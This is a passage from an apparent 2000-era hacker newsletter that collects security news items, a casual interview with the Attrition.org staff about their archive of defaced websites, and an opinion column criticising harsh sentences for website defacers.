what the effect of the GPL would be. But she said cphack authors Eddy Jansson and Matthew Skala had signed a contract with Mattel and if there was any deception, "they'd be in big trouble." The agreement with Jansson gives "all rights, if any" to the cphack source and object code and accompanying essay to Mattel. The agreement also states that Jansson and Skala attest they "are the sole proprietors of all rights" involved with cphack and have "not assigned" them to anyone else. Even if Mattel cannot claim exclusive copyright in cphack, it may be able to pursue lawsuits on other grounds. @HWA 138.0 HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles For giving out long distance White House telephone access codes a U.S. Army Sergeant has been arrested. The codes allowed 9,400 calls worth $50,000 to be placed to locations around the world. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html ---------- See the ISN story. @HWA 139.0 HNN:Mar 29th:Another DVD Work Around on PlayStation 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse This time fans have discovered a way to exploit the game console's analog RGB output to copy DVD content to a videotape, circumventing the system's copy-protection technology. The technique is being discussed on Japanese web sites. (Wonder if this will have any impact on the current MPAA and DeCSS case.) TechWeb http://www.techweb.com/wire/story/TWB20000324S0007 ---------- Second Backdoor Found In Playstation 2 (03/24/00, 3:44 p.m. ET) By Yoshiko Hara, EE Times Video enthusiasts in Japan have found a second backdoor in Sony Computer Entertainment's newly launched Playstation 2. This time, fans have discovered a way to exploit the game console's analog RGB output to illegally copy DVD content to a videotape, circumventing the system's copy-protection technology. The technique is being discussed on Japanese websites. The discovery of such a flaw is another blow to Sony, already embarrassed earlier this month when users in Japan found a way into Playstation 2 to subvert a geographical code for DVD video disks. So far, the issue has not raised the ire of movie studios or others in the consumer electronics industry. However, it could accelerate a movement that's quietly forming behind the scenes to develop a new copy protection scheme for the legacy analog RGB interface used both in Playstation 2 and on PCs. At issue is whether Sony Computer Entertainment has violated a DVD industry agreement that prohibits DVD players from having an analog RGB interface. If so, it's possible that Hollywood studios could take some action against Sony. But some in the industry pointed out this week that Sony could make the case that Playstation 2 is not a stand-alone DVD player, but a PC. Under the DVD specs, PCs are permitted an RGB output. So far, however, Sony has not resorted to this argument. Sony Computer Entertainment acknowledged on Wednesday that problems with copy protection can arise from the use of an analog RGB interface, but said the company did nothing wrong and that the RGB interface on the Playstation 2 complies with the DVD specs. A company spokesman said Sony installed in Playstation 2 appropriate means of preventing any illegal analog-to-analog copying, by providing security coding from Macrovision for all the system's output interface signals: RGB, composite, component, and S-video. For copy protection of analog RGB signals, Sony worked with Macrovision to add Macrovision code in RGB's synchronous signals, the Sony spokesman said. Further, the game console comes with a cable that outputs widely used composite video signals. An optional cable outputs S-video signals and component signals. In either case, these video signals are protected by Macrovision technology, and taped images are therefore of a substantially lower quality than the originals. That means that nonhackers cannot readily duplicate DVD video content, the spokesman said. However, anonymous sources have posted on various websites the circuitry diagram and the model name of a converter designed to turn analog RGB signals into NTSC video signals. This converter is also capable of inadvertently removing Macrovision code. Engineering executives at leading DVD hardware manufacturers, who spoke on the condition of anonymity, expressed frustration with the situation. They said the DVD Copy Control Association (DVD CCA), a licensing agency based in Morgan Hill, Calif., has prohibited outfitting any DVD player with an analog RGB output. The only exception is a Scart connector, a 21-pin connector used in Europe that includes RGB output pins and comes with its own copy protection measure. "DVD CCA is aware of the reports about this situation and we are looking into it," a spokesman for the association said. Meanwhile, Sony Computer Entertainment has not given up its plan to deliver better picture quality for displaying DVD images through an RGB output. The company has proposed to the DVD Forum a new cable specification featuring Sony's proprietary 12-pin connector at both ends of the cable. This cable directly conveys analog RGB signal from the Playstation 2 console to a TV set. Sony is currently the only company selling TVs with a 12-pin input. So far, it is still unclear how the movie industry will respond to the Playstation 2 issue. Studio executives acknowledged this week that protecting against illegal analog-to-analog copying via analog RGB output has been a contentious dilemma for studios and the computer industry. But most studios were hesitant to complain about Playstation 2. When the DVD standard was first developed several years ago, the consumer electronics, movie, and PC industries all agreed to allow an analog RGB output for PCs, but none for stand-alone DVD players. According to sources working closely with the DVD Forum's Copy Protection Technical Working Group, the three industries reached that compromise because SVGA was the only legacy link available to connect a PC subsystem with an analog PC monitor. If studios ever wanted to let consumers watch DVD movies on a computer, this was the only pathway. Meanwhile, consumer electronics manufacturers agreed to use composite, component, or S-video -- all protected by using Macrovision technology -- instead of an analog RGB output. Some observers said the fact that different industries got different treatment from Hollywood could wind up backfiring. Sony Computer Entertainment, in theory, could argue that Playstation 2 is not a stand-alone DVD player, but a computer, experts said. The console doesn't have a DVD decoder chip, but decodes DVD in software. Therefore, it could be argued that Playstation 2 should be permitted an analog RGB output, like any PC on the market, according to this camp. One Hollywood studio executive, commenting anonymously, said he is not overly concerned with Playstation 2. In his opinion, the picture quality of analog-to-analog copying via analog RGB is too weak to pose a real threat to filmmakers. Others in the movie industry, however, said Sony may have to solve the problem before it introduces the new game console in the United States, where DVD-Video penetration is far more advanced than in Japan. Also, Hollywood is giving PCs another look as they become capable of receiving HDTV broadcasting. An unprotected analog RGB interface between a computer and a monitor can allow copyrighted material -- particularly high-definition signals -- to traverse "in the clear," with no copy protection, becoming a conduit for mass copying. One studio executive, who spoke on the condition of anonymity, said that new ideas on copy protection for the analog interface are under discussion among PC, consumer electronics, and movie makers. Companies such as Hitachi, Intel, Matsushita Sony and Toshiba -- all with a big stake in the issue -- have been working to find a solution, the executive said. He indicated that an answer might emerge in the next few weeks. "Although we have not received any technical information about this [Playstation 2] issue yet, if the content is actually being copied from Playstation 2, we need to discuss [matters] with Sony Computer Entertainment to take effective measures," said a spokesman at Sony Picture Entertainment, Tokyo. @HWA 140.0 HNN:Mar 29th:Interview with Attrition Staff Posted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by WHiTe VaMPiRe Project Gamma has recently conducted an interview with the ATTRITION staff. They detail future plans and speak of how they originally started, among other things. Project Gamma http://www.projectgamma.com/news/interviews/attrition.shtml ---------- sorry about formatting, figured it best left as is. -Ed ATTRITION Date Published: March 27, 2000 Date Conducted: March 25, 2000 Interview Conducted By: WHiTe VaMPiRe Interview Conducted With: ATTRITION ATTRITION is a leading computer security Web site with dedicated staff. They are probably best known for their defaced Web site archive, as they were among the first to mirror defaced Web sites and provide them to the public. We came in contact with the ATTRITION staff and asked them about their plans for the future, how they first started, and more. This interview will be left largely unedited due to the nature of the interview and the amount of people involved. This is to make sure that the original intent of their answers is left intact, without distortion of their message. Questions will be colored, answers will be indented. The ATTRITION staff consists of: cult_hero aka jericho aka Brian Martin cOmega - Cancer Omega modify punkis McIntyre munge What initially brought about the creation of ATTRITION? A need for change primarily... before attrition was sekurity.org sekurity.org had a great concept, but no focus or direction dropping it was a way of dropping the lack of direction and let us move on attrition wanted to be more to the point more honest, more in your face no sugarcoating on our words Definitely in-your-face. no pretty eye candy to obscure information Mostly a meat and potatoes site with little to no window dressing. although people still have trouble reading it heh. BLACK AND RED IS HARD TO READ YO Those come from ppl who don't grok client-side configuration. Who were the initial people involved with the founding of ATTRITION? correct me if i am wrong.. Jericho, Punkis, Modify and myself. Meinel, JP, Winn Schwartau, and Atkinson but i thought it was punkis/comega/me on irc discussing it. modify: die die die die sorry, had to :) cult_hero: yeah, there was a flurry of emails between us, to. maybe mod was there and lurking ;) yes, lots o mail cult_hero: most likely. ;-) in the end, it came down to a list of 10 names attrition made the cut On that note, what made you go with the name ATTRITION (besides the obvious)? let me ask you... what is the obvious? so the CIA -WAS NOT- involved in the founding of Attrition? no, the NSA oh wait ;) FBI i mean. yeah, we're their front or something. Well, the definition, I suppose. As one of you said so appropriately before, "in your face." IIRC, Jer wanted something serious. I would have been happy with a "go-pound-sand-up-your-ass-with-a-mallet.org" domain. attrition literally means "confessing for your sins, but not for the love of god" to me that kind of meant confessing for your sins (read: mistakes) because you had a sense of ethics, honor, morality, duty, etc. not that jer has any of that stuff * punkis snickers When jer brought the name up, it seemed quite appropriate too, given that the state of security these days is largely a war of attrition. Thinking about it, my definition of ATTRITION in my own mind was changed as I became more familar with your work. vamp: as well as it should... attrition means a lot of things between a print dictionary, classic literature, dictionary.com etc * cOmega nods. each viewer interprets and uses the site in their own way because of that, we were able to kind of form our own hybrid definition i think How did each of you become involved with ATTRITION? Back in March 1997, I had made a fool of myself with the hacker community. I got involved because I enjoyed working with the system and was willing to pitch in when Jer was quite busy. The NCAA Web site was defaced......to make a long story short it was way too easy to track the kiddie down.... I had never done it before and made a big media whore of myself.... i got involved because i wanted to carry on what i had been doing for five+ years.. with more focus Then I started doing more and more stuff...like crashing jer's place about every other weekend. then was outted for the fool I was :) 2 years later.... I stumbled across some CPM stuff...was floored... I went to Deja.com searched for her news postings....and found a doozie. i got involved by pitching in on some of the scripting jericho was working on.... while comega went to sheep.com Another reason why I got so involved with Attrition was because I work for the US government...and they have NO clue about security. cult_hero: sheep.gov, mo-ron. munge: some? hah, you did 300% more CPM admitting she took LSD in the 70's when it was medically legal for "brain damage"...her words :) haha cult I passed it onto Jer and that, as they say, is the beginning of a beautiful friendship :) I've known Jericho since 94 After a long day at the office, coming home to Attrition was a breath of fresh air...validating in its own perverse way. he kicked my teeth in and we have been friends since I got involved with attrition because jericho liked my cat What does ATTRITION mean to each of you personally? sometimes i think i could write a book on just that. yup its a love/hate relationship for sure dunno... Attrition to me is not only a clearinghouse of valuable information on security, it also contains a load of information as to the consequences of what happens when people don't take security seriously. biting sarcasm, a sharp wit, and forced attrition of those who think they can get away with it there is just so much involved with it... so much going on public and behind the scenes (nothing too exciting mind you, conspiracy theoriest of the world k39383) We're known largely for our mirror, but that's less than 50% of what we're all about. plus its a lot more cO music reviews, sushi reviews, wine reviews The mirror shows the consequences; the rest of the Attrition site shows how one can be proactive about security. punkis: true. and calamari it's about the calamari, dammit Calamari is next to godliness. yes yes it is To be honest I've found good friends at Attrition.. beyond the obvious I have found family there and there is a roy's right by work punkis: oh yes. Sushi King rules... I'd like to plug them errr... not in that way though :) modify: there's a picture I didn't need. Basically, we're all a bunch of sick little monkeys who happen to think alike and we share our various passions in life through this 24-hour megaphone of technology known as attrition.org What do you have planned for ATTRITION's future? personally I want to see a technical focus on attrition attritions future. mostly continuing what we have done and making it better. more access to the information, better stats, better cross ref we have been planning a lot more tech areas *nod* which punkis will be heading up soon i think punkis: agreed; more of a focus on technical papers and all that good stuff. you can expect to see the return of errata yes Im thinkin of giving up my Attrition account to join the ranks of the Happy Hacker Grey hat slappy foundation... cult_hero: rad. yes, would like to focus more on technical projects Errata, in what sense? the errata section that deals with shoddy journalism on the net and in print www.attrition.org/errata/ modify: w00t it actually was one of our earlier widely recognized pages Ah, right. Negation came to mind as part of that. lead to a lot of attention and validation of who we were. God knows there's enough errata out there. errata linked to negation yes The technical projects, what do you have planned in that regard? I would like to see more technical documents and programs released by Attrition and its Staff I have some ideas for some security related tools I want to put together and a couple of real interesting research ideas I'm working on a full PGP guide that will walk users through the command line and gui versions; installation and usage, as well as caveats. I also have a big-ass proposal I'm working on and will be hopefully releasing under the attrition banner. I'm leaving my government job. Are there any common misconceptions behind ATTRITION that you would like to clear up? YES YES 1. we are not a company HELL YES 2. we do not profit from attrition 3. we are not an FBI front 1. We are not a Hacker Gang. 2. We are not LE. 4. mcintyr5e is really a woman 4. we are not affiliated with the FBI, CIA, ISA, NSA, DOD, etc 6. We never worked for FEMA 3. We are NOT "out to get anyone" - we just tell the truth, unpretty as it is. 5. we are not HFG, ULG, GH, or any other kiddy defacer group but, cult, we do meet in giant bunker shaped like a pentagram 4. Punkis is really a man. 6. Yes, we really do have a helicoptor 7. Modify is really a cat. 7. Meinel and JP lie 100% of the time 5. We have guns, but we don't have any machine guns. 10. Loop 1 10 goto 1 6. We are NOT into vampirism or bloodletting (unless there is sex involved) i do not work for KPMG i was not fired from any security job i am not an fbi informant I do work for NASA 11. I need a woman so if any single, attractive women are out there then.... I am leaving NASA for a better job. attrition has fufilled 2 federal subpoenas in accordance with US Law (I know those fuckwits will lie and say I was 'fired' or some shit.) When did ATTRITION initially start the defaced Web site archive? Actually, defacement mirroring started before attrition. It became "institutionalized" under attrition. comega started it long ago back when it was an uncommon occurance I was doing it way back in the sek.org days. I mirrored only sites that I thought were entertaining or elegant in some way. Craig Whitmore started it My favorite of all time is "That 0wned Girl". So ATTRITION's mirror was actually a continuation of a project initially started by cOmega? yes In a manner of speaking. Jer took the idea and pumped it full of steroids. yes When I joined up in Fed 1999......I went around to other dead mirrors and asked if we could archive their material 001. comega's mirror of elegant hacks 002. collection of other mirrors 003. start to mirror new sites 004. begin to refine process 005. begin to automate the mirror process 006. revamp the mirror 007. further refine mirror, automatino, etc. cult_hero: we got to port the mirror into a db. mSQL or similar 008. begin to take a more active stance in awareness and statistics that is kind of the progression that is a future goal of the mirror DB it, and make it more searchable * cOmega nods. more stats Munge is working on some killer graphical stats pages regarding defacements these will be the kind that make CERT look bad it will put CSI/FBI to shame let me rant a sec one thing we have going for us about the mirror.. is that people report the incidents to us not just the hackers but admins sometimes because of this, we can generate a lot more comprehensive stats than the FBI/CERT does because people see reporting to them as a waste of time their lack of response and action discourages further reporting The FBI only investigates cases involving mondo $$$ or mondo politics. because of this, we hope to take their place in providing realistic statistics regarding computer intrusion One clarification here though everybody and everybody reading this fbi unofficial amount is 5k WE DO NOT HACK THE SITES THAT APPEAR ON THE MIRROR heh thank you mod And our work has one great benefit: we don't do this to pump up our budget or increase revenue (unlike the .com's and .govs) amen we do it because we are passionate about it. so stop accusing us ya lackwits and as we have said, we have all turned down consulting work from the mirror modify: werd to that. and we continue to do so as much as we hate to do it (and admit it), we've lost some great consulting gigs if we did this for indirect money, i think it would somewhat invalidate our purpose and reason Agreed. Oh yes, one more thing. yah, but maybe I should get the arts and crafts store to provide financial backing? Please ask the kiddies to stop asking us 1. how to hack, or 2. how they can break the law in fucking with their ex or stupid shit like that. The next question was, "What is your reasoning behind the defaced Web site archive?" .. but I believe you already answered that. lemme clarify something people like to say that we encourage kids by providing the mirror as punkis always mentions, does this means the news agencies are guilty of encouraging murder? they write about it, live around it, film it, feed it to the masses Like I said earlier, the mirror shows what the consequences are if someone doesn't take security seriously...and website defacements are the LEAST menacing consequence. Consider the intruder who alters your data or silently swipes a credit card databse (unlike Curador). Now *that* is scary. 1. if we don't do it, someone else will. 2. with us doing it, we think we can do it with a lot of integrity and milk it for valuable info in the form of stats and comparisons So....we might as well do it fully and completely 3. we berate the shit out of the kids reporting these sometimes. we call them lame script kiddies for their actions. 3.5 we do NOT condone their activity any more than shrinks condone the behaviour of their clients no doubt What are your personal feelings on Web site defacements? Lame. I think they are fucking lame stupid such as is tagging There is no elegance in it these days. no purpose same thing Just greets and swearing. 99.9% are a waste of time, talent, and purpose 99.9% require no tallent nod any reason to hack amnesty international? At least the "That 0wned Girl" defacement was funny. no At least those done for hacktivism had a reason..... yah, that rooled who reads the mirror archive just to see the defacements anymore? not me. 'nuff said. Some other hacks that I mirrored early on were funny as hell. if we don't mirror them, they will continue to happen tho and when they defaced KKK it was fucking stupid....no message the URLs will be passed around IRC and mail lists I've seen maybe 5-6 good ones since I started last February..... 1999 'Hacktivism' these days is a shroud / justification for lacking actions, quite frequently, from what I have seen. so we mirror them despite their lame message *nod* all the rest are just plain wasteful. hactivism is a myth its a freakin excuse WHiTe_VaMPiRe: Given what I've seen, hactivism is a myth. lets face it * cOmega hi5's punkis. Don't fucking hack a site because you can. i think i have found a way to identify hacktivism. no signature. if you are hacking for a reason, there is no need to put a name, group name, or greets. It's like this: if you have a beef with, say, Big Oil, would you picket a Mom & Pop dime store? those that do so are using it as a justification, not for pure hacktivism That's what these kiddies are doing when they hit 'smalltime.com' and bitch about 'big government'. I hacked it for freedom of speech or freedom of information is a crock of shit too... cOmega...exactally. like the Japanese servers defaced today to rant (in english) about Pakistan/Indian issues If you have a message. Deface a site that has something to do with that message (not that we condone it...) It's like when H4G1S hit NASA HQ. They bitched about commercialization of the Internet. Uhhh...DUH? Then why not hit a .com, ya sutpid fucks? if hackers want to have an impact, then they should donate their time and skills to causes they believe in. From what you have seen, what are the common motives for Web site defacement? 1. Because they can WHiTe_VaMPiRe: juvenile angst. motive is because they can yes I agree with mcintyre 2. To make fun of another group/rile them up and because they think 'hacking' is sexy 3. to test their skills "everyone else does, it must be what hacking is about, so i will do it so i can be a hacker" 4. to show off circular logic WHiTe_VaMPiRe: why do young kids go hot rodding? It's a rush and it makes them feel big. defacing a web site != hacking donate time to green peace, something like that. don't deface a corporate website punkis: word. stop at #1 and loop *nod* punkis 5. to get their message out regardless of what site they deface Doing a ./latest-sploit.sh != hacking And the only thing lamer than defacements is DoS'ing. 6. being the first to deface a new country.... 7. being the first to deface an new OS (ie Win2k) yah, and running UNIX exploits against an NT server isn't gonna work... thats TIP #1 defacing a "secure" company hahahha and iishack is not effective against apache haha lol or the morons who tried to hit us with IIS exploits the other night hahah Nice. I bet it won't be long before someone tries to deface a Palistine site (.ps) when they go live. Remind me to show you my logs at work sometime. Not a lot of brain thrust out there. Do you feel that there is any valid motive for defacing a Web site? good question valid MOTIVE? sure strictly speaking of motives, i think so valid reasoning, I should say.. women only.. just od it for women true hacktivism. david vs goliath (angry consumer vs large corp) its just a shame no valid motives are never demonstrated like Zyklon exactly mod: that is called obsessive stalking i think like I said, KKK was defaced, which I have no problem with, but there was no message whats wrong with that ? I can see doing it as a prank between friends, but as an actual intrusion with intent to damage someone else's property, I couldn't go with that. Minor exceptions would be made for hate groups and/or pedophiles. But that's on principle alone. I think defacements generally denigrate the intent of doing good. especially when these fuckwits are defacing schools that really have no admin/security personel to speak of they are helpless i could see doing it in a completely oppressive society, with no outlet for free speach, against that oppressive gov't nod lik k12 doms WE DO NOT ENDORSE DEFACEMENT OF SITES... WE JUST ARCHIVE!!! message #2 sorry just clearing up FAQ's Do you have any comments on the legal implications of computer crime? WHiTe_VaMPiRe: legal implications? can you be more detailed? explain. The current law enforcement response to say, Web site defacement, and other forms of computer crime that are starting to become more prominant. I personally believe the idea of increasing penalties for hacking is utterly wrong-headed. another book in the making yes cOmega: *agreed* Security is not rocket science. Poor admins are too easy to point fingers.. If the government would focus more on the ounce of prevention rather than the pound of cure, we would have have 1/10th of 1% of the number of intrusions we have today. ITS YOUR JOB@!!!! stop surfing porn modify: right on. haha maud As my mother said, it is a knee-jerk reaction you find made by law enforcement to ANY 'new' type of crime well put the media doesn't help matters, either. it puts for the proposition that these scriptkiddies are 'geniuses' because it's a sexy story. the media is the driving force behind the governments reaction it's not sexy enough to say that the admins are lazy bums and that everyone and theire brother who had a clue knew about the vulnerability 2 years ago. What response do you feel would be most appropriate from law enforcement? I expect nothing appropriate from law enforcement. "you were broken into because you are stupid. secure your machines" The legislature is the only branch that can change it. Taking the time to learn the technology they're dealing with Kick every door in until you find the culprit :) rather than working against it LE is just a group of droids who follow orders. i think most web site investigations are a waste of tax payer money like mod said, so your fucking job cult_hero: agreed++ s/so/do Admins need to take more time to look at the security of their network its not freakin hard some of the mail we get from cluless admins really floors me As more laws are being passed as of late, and others trying to be passed, what do you think is the best response? More laws, less laws? What type of laws? What do you feel the overall best response to computer crime and punishment would be? The same laws. The laws are NOT the problem. WHiTe_VaMPiRe: I'll tell you this: out of 2,000 admins at one NASA center, I can count on one hand the number who actually understand how to lock down a server. And people wonder why NASA gets breached so often! Security awareness... I think the FBI need to stand back and qualify what is worth investigating. WHiTe_VaMPiRe: I think the next law that gets passed should be one that set a mandatory limit on what qualifies someone to be an admin. a large media response is not a good justification for an investigation They are being jerked in every direction by bureacracy, charlatan consultants claiming to have miracle solutions, media pressure, and more how can they be expected to do a good job when they have no understanding of the security arena? The proposal I'm working on should eradicate a lot of charlatans and snakeoil in the industry. I love the admins that throw up a NT server and leave it... kinda like leaving your car running while going to the store Why concentrate on a Web defacement where nothing was deleted, yet ignore the constant intrustions into gov servers by machines in foreign countries Think the FBi would have busted Curador had there been no media attention? hell no. cult_hero: curador also wiggled his ass at them, which was not a bright thing to do. curador bragged too much. without the media attention, they never would have seen such ass wiggling heh true Although, I have to admit....there was less attention on Curador than there was with Max Stone and the DDoSers What got Curador was that he used the stuff he stole. Which was not too terribly bright. oh.. new buzzword bingo will be "Zombie Attacks" look for it at a theatre near you! fraud bumped it into a new level of crime that and he kept moving from place to place leaving a new trail to add to the investigation each time. I think the other half of that criminal investigation should be the sites that left CC data on the server unencrypted. all free servers, which log heavily I'd like to stay with that for a moment. You see, a lot of our rights are under attack by our own government. Our right to explore (ala restrictions on reverse engineering) Our right to possess firearms Our right against unreasonable search and seizure (see the drug laws) Did you know that if you carry around more than 500 dollars on your person and a cop sees it, that money can be legally taken from you WIHTOUT your being arrested or charged?? And you have to PROVE you have it legally. I kid you not. It's part of the zero tolerance anti-drug laws. look it up. I -- right now -- am a Fourth Amendment nightmare waiting to happen. I plan to rant on it via attrition in the future. Guns are my primary passion. To me, the 2nd Amendment is as crucial as the First Amendment (which is what Attrition is all about). As the defaced Web site archive seems to be the area most focused on within ATTRITION these days, what section do you feel is most overlooked, or does not get as much attention as it deserves? calamari errata and our various tech areas vulnerabilities staff.html ;) Newbie haha Firearms. more seriously, 1. the stats I cannot end this interview without asking this thought provoking and vital question running through everyone's mind.. do you guys like Ramen (noodles)? Always room for Ramen i dig ramen. with butter not as much as calamari, sushi or mississippi mud tho Ramen: Yes. I don't eat Ramen...but Satrina does. I eat Popcorn. sushi Filet Mignon. yes, sushi is the best hmmm sushi enough of that hehehe Whiskey Sours, Mudslides, General Gau Chicken, and Nigiri there is this place Sushi King Okay, okay, what 'geek' does not like Ramen. Answer this, what kind of Ramen do you prefer? COFFEE. its a great place for the gender benders like jericho I dig the Cup o Soup honestly. i like the chili ramen :) I eat Habanero chilis and popcorn. I was born before Ramen came into existence. Anything you would like to discuss or any closing comments before we end this interview? One thing I'd like to add. if something isn't covered here... just mail and ask Okay, will do. Thanks a lot for the time. We are a proactive group. We are also very *pro* on things like accuracy, truth and fairness. not just you vamp, all the interview readers too. This does not mean we are against anyone. We are only against those people who do not practice accuracy, truth or fairness. It's a matter of principles, not personalities. And don't let anyone tell you different. ATTRITION is reachable at http://www.attrition.org/. You can find more information about the staff on this Web page or mail them. @HWA 141.0 HNN:Mar 29th:The Unfairness of Computer Crime Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Agrajag Are the punishments given to those who commit relatively minor computer-related crimes, such as web page defacements unfair? Rather than being treated like their real-world counterparts (eg: trespass and spray-painting graffiti), and earning the fairly minor sentences that fit the actual crimes, they are most often instead treated as serious felonies deserving of overly harsh punishments, which are simply completely out of line with the crimes committed, and are seemingly only given just because a computer was involved. Linux World http://www.linuxworld.com/linuxworld/lw-2000-03/lw-03-devnul_3.html ---------- A matter of degrees: Let the punishment fit the crime. Summary When Attorney General Janet Reno's report, "The Electronic Frontier: The Challenge of Unlawful Conduct on the Internet," was published earlier this month, it drew the conclusion that "existing federal law is generally adequate to cover unlawful conduct involving the use of the Internet." J.S. Kelly rather vehemently disagrees with that finding. (2,000 words) By J.S. Kelly US attorney general's report, entitled "The Electronic Frontier: The Challenge of Unlawful Conduct on the Internet," repeatedly emphasized a need to treat unlawful conduct online the same as it is treated offline. At least two glaring examples of how cyber issues are handled differently than their counterpart issues in the non-Internet world were not included in the report. One of those issues is that car manufacturers, unlike software companies, are held liable for selling products they know are defective. I'd like to address that well known shortcoming in a future column, devoting this one to an issue that's even more important. Free Coolio In the first week of March, at about the same time the report was published, news sources reported that a 17-year-old New Hampshire kid, who goes by the online name Coolio, had been detained as a suspect in a hacking case. The teen told reporters that he had defaced three Web sites, of which two were US government sites. But they weren't exactly the equivalent of the Pentagon -- D.A.R.E. is the Los Angeles Police Department's antidrug Website for kids, and the CWC is the relatively unknown and unimportant Chemical Weapons Convention Webpage. The site hosts informational texts relating to the CWC, a global treaty that bans chemical weapons. The third supposed hack (a hijacking, actually) attributed to Coolio is that of RSA, a commercial computer security company. Website defacement is being described by US authorities as felony vandalism, while in Canada the same phenomenon seems to be called malicious mischief to data. Let he who is without youthful indiscretions cast the first stone The media, with visions of Pulitzer prizes dancing in their heads, have pursued this story with due diligence and vigor. News reports described the teen in ominous tones, as "a high school dropout" who "regularly gets high on cough syrup," who is supposedly emotionally unstable because he is liable to fly off the handle when criticized, and whose room is "almost too messy to enter." Give me a break -- the kid is 17 years old. If they'd found a 17-year-old with a really neat room, who was ostensibly not prey to the emotional ups and downs usually associated with adolescence, then I might be a little more worried. I'd prefer that he experimented with cough syrup and mouthwash than with heroin. And he was not a dropout: he left school early and got his GED. Now, you might argue that to break into computers and to deface US government Websites is, well, kind of dumb. I don't disagree. But adolescence is dumb, too. Adolescence is all about testing limits, standing up to authority (and rejecting it) and generally behaving like an idiot. It's also about thinking you'll never die, and that you'll never get caught. According to news reports, Coolio will be charged as an adult with "unlawfully accessing a computer or otherwise disrupting computer operations that results in more than $1,000 in harm." (D.A.R.E., a not-for-profit organization, claims it lost $18,000 -- from the potential donations that might have flooded in to the site had it not been in its altered state.) If convicted (as an adult), the kid could face 5 to 15 years in prison and a maximum fine of $4,000 -- for one Website defacement. He has, however, admitted to three, and that would earn him a potential total of 45 years in jail. But he got D.A.R.E. twice -- so that could bring the number of years to 60. You know, I just don't think adolescent pranks usually carry these kinds of consequences in the real world. Tough on crime Reno's Department of Justice report mentions the need to teach kids in schools about ethical computer use. The department plans to use a cartoon character similar to MacGruff the Crime Dog to ensure the friendliness of the message. Something tells me they're targeting the wrong demographic here. The report also suggests that courts not be required to sentence all computer intruders to what is now a mandatory six-month jail term for unauthorized access to systems. (Note that the use of the word systems is pretty vague here, as, for that matter, is the use of the term unauthorized access.) The motivation for the sentence reduction is not mercy. It is the opposite. The attorney general's report explains: "In some instances, prosecutors have exercised their discretion and elected not to charge some defendants whose actions otherwise would qualify them for prosecution under that section, knowing that the result would be mandatory imprisonment." The Justice Department wants more convictions, and it is willing to waive mandatory sentencing to get them. Imagine how conviction rate statistics for computer crime might jump from 1999 to 2000 if the department's request is granted. Reno's report continues: "Computer hacking 'for fun' is a very serious problem not only for the targets of the attacks but also for law enforcement personnel who often have no way to determine the motivation for and the identity of the person behind the intrusion." That bothers me. Our laws permit us to determine motivation for crimes such as murder in the first degree versus manslaughter -- or the difference between loitering and loitering with intent. I guess it's the purview of the court -- and not law enforcement -- to determine the motivation, just as it's allegedly in the purview of the court -- and not the legislature -- to determine sentencing. But if motivation is considered to be important in murder and in loitering, why isn't it considered to be important in computer intrusions? Too much free speech In Coolio's case at least, the messages that he allegedly left on each of the Webpages might serve as our first clue to his motivation. You can see all of them at the attrition.org mirror site (see Resources for URL). The RSA defacement was a parody of the firm's regular front page -- it was even pretty funny. At D.A.R.E., he twice replaced their regular home page with (pretty lame) "pro-drug" messages. But the last line in the text to his CWC defacement made me laugh out loud. The entire text reads: PEACE THROUGH POWER ONE VISION ONE PURPOSE muhaha I did steal head server of Internet. If push "power" button the hole net will be shutdown. I hate all you Quake Playas!! !!uu!! And if push reset button the whole Internet going to DIE Praise Allah and also Coolio for making this all possible! If prayers do not become mandatory throughout the United States, we will detonate our nuclear bombs and your President Clinton and his interns will die. One more thing, there is too much free speech on the internet, we want you to try to do something about it. Thanks. This CWC message was described by the Secret Service and reported by MSNBC as a death threat to the president. I respect the fact that law enforcement needs to treat death threats seriously. I also respect the fact that security personnel -- in law enforcement as in computer security -- are paid to be paranoid. But I do think that calling Coolio's text "a death threat to the President" is stretching it a bit. Dare I suggest that the D.A.R.E. site's damage estimates are also exaggerated? I wonder how they would estimate damages and determine the motivation for an incident in which somebody's domicile was toilet-papered? After all, the act involves trespassing, doesn't it? It sounds like a pretty serious breach of security to me, and it could happen to anyone. After all, the streets are totally unregulated. Perhaps scariest of all is the fact that if it happened to me, I would never, ever be able to trace the perpetrator who originated the attack back to his house. Somebody declare a state of emergency, quick! Is your refrigerator running? If instead of defacing its Website, Coolio had made prank phone calls to D.A.R.E., would those calls count as unauthorized access to systems? Would the Feds be calling for the power to install phone taps on all of the nation's phones to catch him? Would they spend thousands of dollars in taxpayer money to crisscross the entire country in search of him and then threaten him with 5 to 15 years in jail? Would he have been portrayed as a guilty-until-proven-innocent hoodlum in the media? Not all "computer crimes" are equivalent to one another. Merely poking around a system is different from defacing a Website -- which is different from stealing passwords, which is different from stealing credit card numbers, which is different from actually using those credit card numbers. If you don't know what I mean by that, then G. William Troxler's essay about different types of hacking (see Resources) might be a good starting point towards understanding some different motivations for "unauthorized access to systems." I guess law enforcement is asking for such tough sanctions against kids (felony vandalism, indeed) in the attempt to "scare them straight" and teach them to "respect the law." It's OK to try to do that. But it is not OK to do that with inhumane and inappropriate punishments that do not fit the crime. That area of law is dangerously broken. If you don't believe me, go read Robert W.F. Clark's account of being arrested for computer crime ("My Bust or An Odyssey of Ignorance"), the story of Bernie S, and Brian Martin's essays (see Resources). I'm sure that Coolio didn't think that he would be caught. I'm equally sure that prosecutors won't be interested in his motivation or in investigating what he really did. How soon will it be before young Americans -- of both sexes, this time -- begin to run away from the United States to seek sanctuary in Canada again? I guess we should be glad that at least one North American country appears to be relatively sane. But I wish that the one I live in right now was, too. The real world I am not trying to say that everyone who has breached security is a kid. Nor am I saying that everyone who has breached security is harmless. A great deal of harm can be done -- and probably is being done, even as you read this -- by people of real malice, perhaps people such as the PhoneMasters (see Resources). Criminals should be caught, and they should be punished. But those who violate privacy, embezzle money, and steal credit card numbers don't go around drawing attention to themselves by defacing Webpages. Besides, we already have other laws which can be used to punish people who embezzle money or commit 